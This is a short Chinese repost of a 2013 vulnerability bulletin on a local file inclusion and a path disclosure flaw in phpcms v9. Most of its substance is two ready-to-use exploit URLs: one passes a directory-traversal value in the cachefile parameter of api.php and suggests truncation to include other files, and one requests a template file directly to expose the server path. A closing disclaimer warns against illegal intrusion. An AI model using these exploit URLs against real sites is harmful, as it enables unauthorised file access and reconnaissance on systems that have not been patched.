漏洞播报:phpcms v9本地文件包含+爆路径漏洞

2013-4-1 21:30 发布者: 疯子 阅读:2665 来源:SEAY

我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。

Exp: http://www.php0day.com/api.php?op=get_menu&act=ajax_getlist&callback=alert&path=b4dboy&cachefile=../../../fuck

#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。

Exp: http://www.php0day.com/phpcms/modules/attachment/templates/album_dir.tpl.php?author=b4dboy

#暴路径

注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。

 

摘自:http://www.secoff.net/archives/105.html


关注公众号:拾黑(shiheibook)了解更多!

关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接